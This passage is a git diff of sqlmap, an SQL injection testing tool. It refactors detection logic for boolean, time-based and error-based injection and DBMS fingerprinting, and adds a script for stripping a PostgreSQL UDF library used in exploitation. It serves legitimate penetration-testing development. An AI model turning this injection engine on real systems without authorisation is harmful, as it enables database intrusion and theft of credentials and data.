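    pip install --upgrade sqlmap
    # the console_scripts entry point exposes a 'sqlmap' command that calls sqlmap.sqlmap:main
    sqlmap -hh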
+ +Links +----- + +- Homepage: http://sqlmap.org +- Download: + `.tar.gz `__ + or `.zip `__ +- Commits RSS feed: + https://github.com/sqlmapproject/sqlmap/commits/master.atom +- Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +- User's manual: https://github.com/sqlmapproject/sqlmap/wiki +- Frequently Asked Questions (FAQ): + https://github.com/sqlmapproject/sqlmap/wiki/FAQ +- Twitter: [@sqlmap](https://twitter.com/sqlmap) +- Demos: http://www.youtube.com/user/inquisb/videos +- Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots + +.. |Build Status| image:: https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master + :target: https://api.travis-ci.org/sqlmapproject/sqlmap +.. |Python 2.6|2.7| image:: https://img.shields.io/badge/python-2.6|2.7-yellow.svg + :target: https://www.python.org/ +.. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg + :target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING +.. |Twitter| image:: https://img.shields.io/badge/twitter-@sqlmap-blue.svg + :target: https://twitter.com/sqlmap + +.. pandoc --from=markdown --to=rst --output=README.rst sqlmap/README.md +.. http://rst.ninjs.org/ +EOF +sed -i "s/^VERSION =.*/VERSION = \"$VERSION\"/g" sqlmap/lib/core/settings.py +sed -i "s/^TYPE =.*/TYPE = \"$TYPE\"/g" sqlmap/lib/core/settings.py +sed -i "s/.*lib\/core\/settings\.py/`md5sum sqlmap/lib/core/settings.py | cut -d ' ' -f 1` lib\/core\/settings\.py/g" sqlmap/txt/checksum.md5 +for file in $(find sqlmap -type f | grep -v -E "\.(git|yml)"); do echo include $file >> MANIFEST.in; done +python setup.py sdist upload +rm -rf $TMP_DIR \ No newline at end of file diff --git a/extra/shutils/regressiontest.py b/extra/shutils/regressiontest.py old mode 100755 new mode 100644 index 415714430..39cbd94d3 --- a/extra/shutils/regressiontest.py +++ b/extra/shutils/regressiontest.py @@ -1,6 +1,6 @@ #!/usr/bin/env python -# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) # See the file 'doc/COPYING' for copying permission import codecs @@ -22,7 +22,6 @@ from lib.core.revision import getRevisionNumber START_TIME = time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()) SQLMAP_HOME = "/opt/sqlmap" -REVISION = getRevisionNumber() SMTP_SERVER = "127.0.0.1" SMTP_PORT = 25 @@ -30,7 +29,7 @@ SMTP_TIMEOUT = 30 FROM = "regressiontest@sqlmap.org" #TO = "dev@sqlmap.org" TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"] -SUBJECT = "regression test started on %s using revision %s" % (START_TIME, REVISION) +SUBJECT = "regression test started on %s using revision %s" % (START_TIME, getRevisionNumber()) TARGET = "debian" def prepare_email(content): @@ -41,7 +40,7 @@ def prepare_email(content): msg = MIMEMultipart() msg["Subject"] = SUBJECT msg["From"] = FROM - msg["To"] = TO if isinstance(TO, basestring) else ",".join(TO) + msg["To"] = TO if isinstance(TO, basestring) else ','.join(TO) msg.attach(MIMEText(content)) @@ -84,7 +83,7 @@ def main(): if stderr: failure_email("Execution of regression test failed with error:\n\n%s" % stderr) - failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M) + failed_tests = re.findall("running live test case: (.+?) 
\((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout) for failed_test in failed_tests: title = failed_test[0] diff --git a/extra/shutils/strip.sh b/extra/shutils/strip.sh new file mode 100644 index 000000000..b7ac589e2 --- /dev/null +++ b/extra/shutils/strip.sh @@ -0,0 +1,15 @@ +#!/bin/bash + +# References: http://www.thegeekstuff.com/2012/09/strip-command-examples/ +# http://www.muppetlabs.com/~breadbox/software/elfkickers.html +# https://ptspts.blogspot.hr/2013/12/how-to-make-smaller-c-and-c-binaries.html + +# For example: +# python ../../../../../extra/cloak/cloak.py -d -i lib_postgresqludf_sys.so_ +# ../../../../../extra/shutils/strip.sh lib_postgresqludf_sys.so +# python ../../../../../extra/cloak/cloak.py -i lib_postgresqludf_sys.so +# rm lib_postgresqludf_sys.so + +strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag $* +sstrip $* + diff --git a/extra/sqlharvest/__init__.py b/extra/sqlharvest/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/extra/sqlharvest/__init__.py +++ b/extra/sqlharvest/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/sqlharvest/sqlharvest.py b/extra/sqlharvest/sqlharvest.py index 75dae5093..289d385d2 100644 --- a/extra/sqlharvest/sqlharvest.py +++ b/extra/sqlharvest/sqlharvest.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/__init__.py b/lib/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/__init__.py +++ b/lib/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/controller/__init__.py b/lib/controller/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/controller/__init__.py +++ b/lib/controller/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/controller/action.py b/lib/controller/action.py index b134cef15..be58b02b5 100644 --- a/lib/controller/action.py +++ b/lib/controller/action.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -16,8 +16,8 @@ from lib.core.enums import CONTENT_TYPE from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapUnsupportedDBMSException from lib.core.settings import SUPPORTED_DBMS -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists +from lib.utils.brute import columnExists +from lib.utils.brute import tableExists def action(): """ @@ -48,9 +48,6 @@ def action(): elif kb.nullConnection: errMsg += ". 
You can try to rerun without using optimization " errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection") - else: - errMsg += ". Support for this DBMS will be implemented at " - errMsg += "some point" raise SqlmapUnsupportedDBMSException(errMsg) @@ -77,8 +74,7 @@ def action(): if conf.getPasswordHashes: try: - conf.dumper.userSettings("database management system users password hashes", - conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS) + conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS) except SqlmapNoneDataException, ex: logger.critical(ex) except: @@ -86,8 +82,7 @@ def action(): if conf.getPrivileges: try: - conf.dumper.userSettings("database management system users privileges", - conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES) + conf.dumper.userSettings("database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES) except SqlmapNoneDataException, ex: logger.critical(ex) except: @@ -95,8 +90,7 @@ def action(): if conf.getRoles: try: - conf.dumper.userSettings("database management system users roles", - conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES) + conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES) except SqlmapNoneDataException, ex: logger.critical(ex) except: diff --git a/lib/controller/checks.py b/lib/controller/checks.py index f4c053ec9..3e4698c5c 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1,18 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import copy import httplib +import random import re import socket +import subprocess import time -from subprocess import Popen as execute - from extra.beep.beep import beep from lib.core.agent import agent from lib.core.common import Backend @@ -20,10 +20,14 @@ from lib.core.common import extractRegexResult from lib.core.common import extractTextTagContent from lib.core.common import findDynamicContent from lib.core.common import Format +from lib.core.common import getFilteredPageContent from lib.core.common import getLastRequestHTTPError from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import getSortedInjectionTests from lib.core.common import getUnicode +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite from lib.core.common import intersect from lib.core.common import listToStrValue from lib.core.common import parseFilePaths @@ -38,6 +42,7 @@ from lib.core.common import singleTimeWarnMessage from lib.core.common import urlencode from lib.core.common import wasLastResponseDBMSError from lib.core.common import wasLastResponseHTTPError +from lib.core.defaults import defaults from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -46,9 +51,11 @@ from lib.core.datatype import InjectionDict from lib.core.decorators import cachedmethod from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS +from lib.core.enums import HASHDB_KEYS from lib.core.enums import HEURISTIC_TEST from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD +from lib.core.enums import NOTE from 
lib.core.enums import NULLCONNECTION from lib.core.enums import PAYLOAD from lib.core.enums import PLACE @@ -57,18 +64,27 @@ from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH +from lib.core.settings import CHECK_INTERNET_ADDRESS +from lib.core.settings import CHECK_INTERNET_VALUE from lib.core.settings import DEFAULT_GET_POST_DELIMITER -from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX +from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX +from lib.core.settings import FI_ERROR_REGEX from lib.core.settings import FORMAT_EXCEPTION_STRINGS from lib.core.settings import HEURISTIC_CHECK_ALPHABET +from lib.core.settings import IDS_WAF_CHECK_PAYLOAD +from lib.core.settings import IDS_WAF_CHECK_RATIO +from lib.core.settings import IDS_WAF_CHECK_TIMEOUT +from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH +from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH +from lib.core.settings import SLEEP_TIME_MARKER from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import UPPER_RATIO_BOUND -from lib.core.settings import IDS_WAF_CHECK_PAYLOAD -from lib.core.settings import IDS_WAF_CHECK_RATIO from lib.core.threads import getCurrentThreadData from lib.request.connect import Connect as Request +from lib.request.comparison import comparison from lib.request.inject import checkBooleanExpression from lib.request.templates import getPageTemplate from lib.techniques.union.test import unionTest @@ -82,6 +98,13 @@ def checkSqlInjection(place, parameter, value): # Localized thread data needed for some methods threadData = getCurrentThreadData() + # Favoring non-string specific boundaries in case of digit-like parameter values + if value.isdigit(): + kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\''))) + boundaries = kb.cache.intBoundaries + else: + boundaries = conf.boundaries + # Set the flag for SQL injection test mode kb.testMode = True @@ -89,6 +112,9 @@ def checkSqlInjection(place, parameter, value): tests = getSortedInjectionTests() seenPayload = set() + kb.data.setdefault("randomInt", str(randomInt(10))) + kb.data.setdefault("randomStr", str(randomStr(10))) + while tests: test = tests.pop(0) @@ -102,7 +128,7 @@ def checkSqlInjection(place, parameter, value): # then attempt to identify with a simple DBMS specific boolean-based # test what the DBMS may be if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data: - if not Backend.getIdentifiedDbms() and kb.heuristicDbms is False: + if not Backend.getIdentifiedDbms() and kb.heuristicDbms is None and not kb.droppingRequests: kb.heuristicDbms = heuristicCheckDbms(injection) # If the DBMS has already been fingerprinted (via DBMS-specific @@ -113,7 +139,7 @@ def checkSqlInjection(place, parameter, value): SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms): msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms) msg += "Do you want to skip test payloads specific for other DBMSes? 
[Y/n]" - kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else [] + kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else [] # If the DBMS has been fingerprinted (via DBMS-specific error # message, via simple heuristic check or via DBMS-specific @@ -128,12 +154,13 @@ def checkSqlInjection(place, parameter, value): msg += " and " if conf.level < 5 and conf.risk < 3 else "" msg += "risk (%d)" % conf.risk if conf.risk < 3 else "" msg += " values? [Y/n]" if conf.level < 5 and conf.risk < 3 else " value? [Y/n]" - kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else [] + kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else [] title = test.title kb.testType = stype = test.stype clause = test.clause unionExtended = False + trueCode, falseCode = None, None if stype == PAYLOAD.TECHNIQUE.UNION: configUnion(test.request.char) @@ -165,17 +192,18 @@ def checkSqlInjection(place, parameter, value): lower, upper = int(match.group(1)), int(match.group(2)) for _ in (lower, upper): if _ > 1: + __ = 2 * (_ - 1) + 1 if _ == lower else 2 * _ unionExtended = True - test.request.columns = re.sub(r"\b%d\b" % _, str(2 * _), test.request.columns) - title = re.sub(r"\b%d\b" % _, str(2 * _), title) - test.title = re.sub(r"\b%d\b" % _, str(2 * _), test.title) + test.request.columns = re.sub(r"\b%d\b" % _, str(__), test.request.columns) + title = re.sub(r"\b%d\b" % _, str(__), title) + test.title = re.sub(r"\b%d\b" % _, str(__), test.title) # Skip test if the user's wants to test only for a specific # technique if conf.tech and isinstance(conf.tech, list) and stype not in conf.tech: debugMsg = "skipping test '%s' because the user " % title debugMsg += "specified to test only for " - debugMsg += "%s techniques" % " & ".join(map(lambda x: PAYLOAD.SQLINJECTION[x], conf.tech)) + debugMsg += "%s techniques" % " & ".join(PAYLOAD.SQLINJECTION[_] for _ in conf.tech) logger.debug(debugMsg) continue @@ -204,6 +232,16 @@ def checkSqlInjection(place, parameter, value): logger.debug(debugMsg) continue + # Skip tests if title, vector or DBMS is included by the + # given skip filter + if conf.testSkip and any(conf.testSkip in str(item) or \ + re.search(conf.testSkip, str(item), re.I) for item in \ + (test.title, test.vector, payloadDbms)): + debugMsg = "skipping test '%s' because its " % title + debugMsg += "name/vector/DBMS is included by the given skip filter" + logger.debug(debugMsg) + continue + if payloadDbms is not None: # Skip DBMS-specific test if it does not match the user's # provided DBMS @@ -285,12 +323,6 @@ def checkSqlInjection(place, parameter, value): comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) - # Favoring non-string specific boundaries in case of digit-like parameter values - if value.isdigit(): - boundaries = sorted(copy.deepcopy(conf.boundaries), key=lambda x: any(_ in (x.prefix or "") or _ in (x.suffix or "") for _ in ('"', '\''))) - else: - boundaries = conf.boundaries - for boundary in boundaries: injectable = False @@ -362,8 +394,6 @@ def checkSqlInjection(place, parameter, value): # Use different page template than the original # one as we are changing 
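# Sketch of the widened UNION column range used by the extended tests in the hunk above:
# a lower bound L greater than 1 maps to 2*(L - 1) + 1 and an upper bound U to 2*U, so a
# payload group originally covering "11 to 20 columns" is retried as "21 to 40 columns".
# extend_union_range() is an illustrative helper, not a function from the sqlmap code base.
def extend_union_range(lower, upper):
    new_lower = 2 * (lower - 1) + 1 if lower > 1 else lower
    new_upper = 2 * upper if upper > 1 else upper
    return new_lower, new_upper

assert extend_union_range(11, 20) == (21, 40)
assert extend_union_range(1, 10) == (1, 20)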
parameters value, which # will likely result in a different content - kb.data.setdefault("randomInt", str(randomInt(10))) - kb.data.setdefault("randomStr", str(randomStr(10))) if conf.invalidLogical: _ = int(kb.data.randomInt[:2]) @@ -423,47 +453,110 @@ def checkSqlInjection(place, parameter, value): kb.matchRatio = None kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE) Request.queryPage(genCmpPayload(), place, raise404=False) - falsePage = threadData.lastComparisonPage or "" + falsePage, falseHeaders, falseCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode + falseRawResponse = "%s%s" % (falseHeaders, falsePage) # Perform the test's True request trueResult = Request.queryPage(reqPayload, place, raise404=False) - truePage = threadData.lastComparisonPage or "" + truePage, trueHeaders, trueCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode + trueRawResponse = "%s%s" % (trueHeaders, truePage) if trueResult and not(truePage == falsePage and not kb.nullConnection): + # Perform the test's False request falseResult = Request.queryPage(genCmpPayload(), place, raise404=False) - # Perform the test's False request if not falseResult: - infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title) - logger.info(infoMsg) + if kb.negativeLogic: + boundPayload = agent.prefixQuery(kb.data.randomStr, prefix, where, clause) + boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where) + errorPayload = agent.payload(place, parameter, newValue=boundPayload, where=where) + + errorResult = Request.queryPage(errorPayload, place, raise404=False) + if errorResult: + continue + elif not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): + _ = comparison(kb.heuristicPage, None, getRatioValue=True) + if _ > kb.matchRatio: + kb.matchRatio = _ + logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio) injectable = True - if not injectable and not any((conf.string, conf.notString, conf.regexp)) and kb.pageStable: - trueSet = set(extractTextTagContent(truePage)) - falseSet = set(extractTextTagContent(falsePage)) - candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet))) + elif threadData.lastComparisonRatio > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): + originalSet = set(getFilteredPageContent(kb.pageTemplate, True, "\n").split("\n")) + trueSet = set(getFilteredPageContent(truePage, True, "\n").split("\n")) + falseSet = set(getFilteredPageContent(falsePage, True, "\n").split("\n")) - if candidates: - conf.string = candidates[0] - infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'")) - logger.info(infoMsg) + if originalSet == trueSet != falseSet: + candidates = trueSet - falseSet - injectable = True + if candidates: + candidates = sorted(candidates, key=lambda _: len(_)) + for candidate in candidates: + if re.match(r"\A[\w.,! 
]+\Z", candidate) and ' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH: + conf.string = candidate + injectable = True + + infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'")) + logger.info(infoMsg) + + break + + if injectable: + if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): + if all((falseCode, trueCode)) and falseCode != trueCode: + conf.code = trueCode + + infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --code=%d)" % (paramType, parameter, title, conf.code) + logger.info(infoMsg) + else: + trueSet = set(extractTextTagContent(trueRawResponse)) + trueSet = trueSet.union(__ for _ in trueSet for __ in _.split()) + + falseSet = set(extractTextTagContent(falseRawResponse)) + falseSet = falseSet.union(__ for _ in falseSet for __ in _.split()) + + candidates = filter(None, (_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet))) + + if candidates: + candidates = sorted(candidates, key=lambda _: len(_)) + for candidate in candidates: + if re.match(r"\A\w+\Z", candidate): + break + + conf.string = candidate + + infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'")) + logger.info(infoMsg) + + if not any((conf.string, conf.notString)): + candidates = filter(None, (_.strip() if _.strip() in falseRawResponse and _.strip() not in trueRawResponse else None for _ in (falseSet - trueSet))) + + if candidates: + candidates = sorted(candidates, key=lambda _: len(_)) + for candidate in candidates: + if re.match(r"\A\w+\Z", candidate): + break + + conf.notString = candidate + + infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --not-string=\"%s\")" % (paramType, parameter, title, repr(conf.notString).lstrip('u').strip("'")) + logger.info(infoMsg) + + if not any((conf.string, conf.notString, conf.code)): + infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title) + singleTimeLogMessage(infoMsg) # In case of error-based SQL injection elif method == PAYLOAD.METHOD.GREP: # Perform the test's request and grep the response # body for the test's regular expression try: - page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False) + page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False) output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(check, listToStrValue( \ - [headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] \ - if headers else None), re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(check, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) + or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \ + or extractRegexResult(check, listToStrValue([headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] if headers else None), re.DOTALL | re.IGNORECASE) \ + or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) if 
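# Simplified sketch of the --code/--string derivation performed by the hunk above: when the
# True and False responses come back with different HTTP codes, the True code alone is a
# sufficient distinguisher (--code); otherwise the shortest token present only in the True
# response is promoted to --string. Tokenization here is deliberately crude compared with
# sqlmap's extractTextTagContent()-based candidate selection.
import re

def derive_distinguisher(true_code, false_code, true_body, false_body):
    if true_code and false_code and true_code != false_code:
        return {"code": true_code}
    true_set = set(re.findall(r"\w+", true_body))
    false_set = set(re.findall(r"\w+", false_body))
    candidates = sorted(true_set - false_set, key=len)
    return {"string": candidates[0]} if candidates else {}

print(derive_distinguisher(200, 200, "1 record found", "0 records found"))  # {'string': '1'}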
output: result = output == "1" @@ -485,13 +578,20 @@ def checkSqlInjection(place, parameter, value): elif method == PAYLOAD.METHOD.TIME: # Perform the test's request trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False) + trueCode = threadData.lastCode if trueResult: + # Extra validation step (e.g. to check for DROP protection mechanisms) + if SLEEP_TIME_MARKER in reqPayload: + falseResult = Request.queryPage(reqPayload.replace(SLEEP_TIME_MARKER, "0"), place, timeBasedCompare=True, raise404=False) + if falseResult: + continue + # Confirm test's results trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False) if trueResult: - infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title) + infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title) logger.info(infoMsg) injectable = True @@ -511,7 +611,7 @@ def checkSqlInjection(place, parameter, value): warnMsg = "using unescaped version of the test " warnMsg += "because of zero knowledge of the " warnMsg += "back-end DBMS. You can try to " - warnMsg += "explicitly set it using option '--dbms'" + warnMsg += "explicitly set it with option '--dbms'" singleTimeWarnMessage(warnMsg) else: Backend.forceDbms(kb.heuristicDbms) @@ -530,7 +630,8 @@ def checkSqlInjection(place, parameter, value): msg += "extended UNION tests if there is not " msg += "at least one other (potential) " msg += "technique found. Do you want to skip? [Y/n] " - kb.futileUnion = readInput(msg, default="Y").strip().upper() == 'N' + + kb.futileUnion = not readInput(msg, default='Y', boolean=True) if kb.futileUnion is False: continue @@ -571,20 +672,20 @@ def checkSqlInjection(place, parameter, value): # Feed with test details every time a test is successful if hasattr(test, "details"): - for dKey, dValue in test.details.items(): - if dKey == "dbms": - injection.dbms = dValue + for key, value in test.details.items(): + if key == "dbms": + injection.dbms = value - if not isinstance(dValue, list): - Backend.setDbms(dValue) + if not isinstance(value, list): + Backend.setDbms(value) else: - Backend.forceDbms(dValue[0], True) + Backend.forceDbms(value[0], True) - elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter: - injection.dbms_version = Backend.setVersion(dValue) + elif key == "dbms_version" and injection.dbms_version is None and not conf.testFilter: + injection.dbms_version = Backend.setVersion(value) - elif dKey == "os" and injection.os is None: - injection.os = Backend.setOs(dValue) + elif key == "os" and injection.os is None: + injection.os = Backend.setOs(value) if vector is None and "vector" in test and test.vector is not None: vector = test.vector @@ -597,9 +698,12 @@ def checkSqlInjection(place, parameter, value): injection.data[stype].comment = comment injection.data[stype].templatePayload = templatePayload injection.data[stype].matchRatio = kb.matchRatio + injection.data[stype].trueCode = trueCode + injection.data[stype].falseCode = falseCode injection.conf.textOnly = conf.textOnly injection.conf.titles = conf.titles + injection.conf.code = conf.code injection.conf.string = conf.string injection.conf.notString = conf.notString injection.conf.regexp = conf.regexp @@ -613,7 +717,7 @@ def checkSqlInjection(place, parameter, value): infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert logger.info(infoMsg) - process = execute(conf.alert, shell=True) + process = subprocess.Popen(conf.alert, 
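# Sketch of the extra time-based validation step introduced above: before a delayed response
# is trusted, the same payload is re-sent with the sleep time forced to 0; if that request is
# *also* flagged as delayed, the delay clearly does not come from the injected sleep and the
# finding is discarded, otherwise a final confirmation request is made. send() and
# is_delayed() are placeholders for Request.queryPage(..., timeBasedCompare=True); in sqlmap
# the marker is substituted with the configured delay (conf.timeSec) at request time.
SLEEP_TIME_MARKER = "[SLEEPTIME]"

def confirm_time_based(payload, send, is_delayed):
    if not is_delayed(send(payload)):
        return False
    if SLEEP_TIME_MARKER in payload and is_delayed(send(payload.replace(SLEEP_TIME_MARKER, "0"))):
        return False  # target is "slow" no matter which sleep time is requested
    return is_delayed(send(payload))  # confirmation request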
shell=True) process.wait() kb.alerted = True @@ -634,25 +738,23 @@ def checkSqlInjection(place, parameter, value): logger.warn(warnMsg) msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]" - choice = readInput(msg, default="S", checkBatch=False) + choice = readInput(msg, default='S', checkBatch=False).upper() - if choice[0] in ("s", "S"): - pass - elif choice[0] in ("c", "C"): + if choice == 'C': choice = None while not ((choice or "").isdigit() and 0 <= int(choice) <= 6): if choice: logger.warn("invalid value") msg = "enter new verbosity level: [0-6] " - choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip() + choice = readInput(msg, default=str(conf.verbose), checkBatch=False) conf.verbose = int(choice) setVerbosity() tests.insert(0, test) - elif choice[0] in ("n", "N"): + elif choice == 'N': return None - elif choice[0] in ("e", "E"): + elif choice == 'E': kb.endDetection = True - elif choice[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException finally: @@ -664,19 +766,20 @@ def checkSqlInjection(place, parameter, value): # Return the injection object if injection.place is not None and injection.parameter is not None: if not conf.dropSetCookie and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data and injection.data[PAYLOAD.TECHNIQUE.BOOLEAN].vector.startswith('OR'): - warnMsg = "in OR boolean-based injections, please consider usage " + warnMsg = "in OR boolean-based injection cases, please consider usage " warnMsg += "of switch '--drop-set-cookie' if you experience any " warnMsg += "problems during data retrieval" logger.warn(warnMsg) - injection = checkFalsePositives(injection) - - if not injection: + if not checkFalsePositives(injection): kb.vulnHosts.remove(conf.hostname) + if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes: + injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE) + else: injection = None - if injection: + if injection and NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes: checkSuhosinPatch(injection) checkFilteredChars(injection) @@ -695,12 +798,12 @@ def heuristicCheckDbms(injection): kb.injection = injection for dbms in getPublicTypeMembers(DBMS, True): - if not FROM_DUMMY_TABLE.get(dbms, ""): - continue - randStr1, randStr2 = randomStr(), randomStr() Backend.forceDbms(dbms) + if conf.noEscape and dbms not in FROM_DUMMY_TABLE: + continue + if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)): if not checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, 